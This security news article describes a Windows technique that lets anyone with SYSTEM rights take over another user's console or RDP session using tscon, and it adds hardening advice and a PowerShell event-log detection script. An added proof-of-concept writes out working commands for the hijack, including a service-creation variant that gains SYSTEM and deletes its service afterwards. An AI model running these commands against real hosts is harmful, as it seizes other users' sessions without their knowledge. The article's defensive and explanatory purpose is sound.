Security researcher Alexander Korznikov has described a way to take over any other user's session on the same Windows machine without knowing that user's password. The technique uses only built-in Windows commands and works across Windows versions; its one precondition is that the attacker can already run commands as NT AUTHORITY\SYSTEM (in practice, that they are a local administrator or have a SYSTEM shell from a backdoor). Korznikov himself is unsure whether to call it a Windows feature or a security flaw.
He describes the attack as "privilege escalation and session hijacking". It can also be performed over an RDP session, giving an attacker with administrative access to a Remote Desktop host the sessions of every other user logged in to it.
Hijacking active user/RDP session
The trick is that a user with SYSTEM-level command execution can use built-in Windows command-line tools to switch to any other user session on the machine, whether that session is connected or disconnected.
The attack does not work if the targeted account has no session on that machine: the victim must be logged in, locally or via RDP, although the session may be disconnected (for example an RDP session whose client was closed without logging off).
The attacker runs a couple of cmd.exe commands, lists the existing sessions and selects the one to attach to. This works for local console sessions as well as RDP sessions.
A cmd.exe launched from the Windows logon screen through a Sticky Keys backdoor (a replaced sethc.exe) runs as NT AUTHORITY\SYSTEM. SYSTEM has full control over the session host and can connect to every user session without being asked for a password.
Most striking is that the legitimate user is neither asked to log out nor notified: their session is simply taken away from them.
Its Trivial to Execute for Attackers
A user who already holds administrative rights can obtain command execution as NT AUTHORITY\SYSTEM and, from there, hijack the session of any currently logged-in user without knowing that user's credentials. The Terminal Services session being hijacked can be in either the connected or the disconnected state.
Tools such as Metasploit, Incognito or Mimikatz, normally used to impersonate logged-in users by stealing their access tokens, are no longer needed.
Everything is done with built-in commands. Any administrator can impersonate any logged-in user, either locally with physical access or remotely via Remote Desktop.
Kevin Beaumont confirmed and tested the attack on Windows Server 2016, Windows Server 2012 R2, Windows Server 2008, Windows 10 and Windows 7.
Proof Of Concept
The whole attack takes about a minute and involves only a few steps. Korznikov demonstrated three variants:
1. Windows 7 via Task Manager
2. Windows 7 via command line
3. Windows 2012 R2 via service creation
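The command-line and service-creation variants, written out as an added example (the editor's illustration, not Korznikov's own proof-of-concept or videos). Everything in it must run as NT AUTHORITY\SYSTEM, for instance in a shell a local administrator started with `psexec -s -i cmd.exe`, or in the cmd.exe that a Sticky Keys backdoor opens at the logon screen. The session ID `2` and the service name `sesshijack` are assumptions for the example; the commands themselves (`query user`, `tscon`, `sc.exe`, `net start`) are standard Windows tools.

```powershell
# Added example (editor's illustration, not the article's or Korznikov's own code):
# take over another user's session with built-in commands only. Run as
# NT AUTHORITY\SYSTEM. Session ID and service name below are assumptions.

# 1. Enumerate sessions on this host. Columns: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME.
#    Disconnected sessions show STATE "Disc" and an empty SESSIONNAME; connected ones
#    show "Active" with a name such as "console" or "rdp-tcp#55".
query user

# 2. Pick the victim's session ID from that list (assumed to be 2 here) and note the
#    session we are sitting in ourselves. Windows sets $env:SESSIONNAME for every
#    interactive session, e.g. "Console" or "RDP-Tcp#55".
$targetId  = 2
$mySession = $env:SESSIONNAME

# 3a. Interactive variant ("Windows 7 via command line"): from a SYSTEM shell inside
#     our own session, tscon attaches the victim's session to our console. No
#     /password: argument is required when the caller is SYSTEM; any other caller
#     is prompted for the victim's password.
tscon $targetId "/dest:$mySession"

# 3b. Service variant ("Windows 2012 R2 via service creation"): services run as
#     LocalSystem, so let the Service Control Manager launch tscon for us. This is
#     how an administrator without an existing SYSTEM shell gets one. Note that
#     "sc" on its own is an alias for Set-Content in PowerShell, hence sc.exe.
sc.exe create sesshijack binpath= "cmd.exe /k tscon $targetId /dest:$mySession"
net start sesshijack    # complains that the service did not respond; tscon has already run by then
sc.exe delete sesshijack
```

The only precondition the attacker cannot create for themselves is a target session that still exists, so the practical hardening is to log off disconnected sessions automatically (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Session Time Limits > "Set time limit for disconnected sessions") and to keep local administrator membership to a minimum, since every local administrator on a session host can do this to every other user of that host.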
Korznikov's discovery is not entirely new; it is an expanded version of an older finding. In 2011 Benjamin Delpy, a security researcher at the Bank of France, documented the same session hijacking technique on his blog, in French.
Microsoft has not addressed the issue in the six years since. Most likely it was never considered a security flaw: SYSTEM is trusted with every session on the host by design, and this is simply how Windows is meant to behave.
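Since the behaviour is by design and will not be patched, the practical response is to detect it. The following is an added example (the editor's, not part of the article): it pulls the two artifacts the built-in hijack leaves behind from the local event logs. It assumes it is run as an administrator on the session host, and that logon auditing (which produces the 4778 reconnect events) is enabled, as it is by default.

```powershell
# Added example (editor's illustration, not from the article): find traces of a
# tscon-based session hijack on the local host. Run as an administrator.

# 1. System log, Event ID 7045 "A service was installed in the system": the
#    service-creation variant registers a binary path that contains tscon.
$suspectServices = Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7045
    } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match '(?i)tscon' } |
    Select-Object TimeCreated, Message

# 2. Security log, Event ID 4778 "A session was reconnected to a Window Station":
#    every tscon attach, whether or not it went through a service, produces one.
#    A reconnect of a user's session from a client name or address that the user
#    never logged on from, or one that coincides with a 7045 above, is the hijack.
$reconnects = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4778 } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x    = [xml]$_.ToXml()
        $data = $x.Event.EventData.Data
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Account     = ($data | Where-Object Name -eq 'AccountName').'#text'
            Session     = ($data | Where-Object Name -eq 'SessionName').'#text'
            ClientName  = ($data | Where-Object Name -eq 'ClientName').'#text'
            ClientAddr  = ($data | Where-Object Name -eq 'ClientAddress').'#text'
        }
    }

"Services whose binary path mentions tscon:"
$suspectServices | Format-List
"Session reconnects (compare client name/address against the user's normal logons):"
$reconnects | Format-Table -AutoSize
```

A tscon run directly from a SYSTEM shell leaves no 7045 event, so the 4778 reconnect is the more reliable of the two signals; the service variant is just the easier one to spot. On a session host with many users it is worth forwarding both event IDs to a central collector rather than reading them locally, since an attacker with SYSTEM can also clear the local logs.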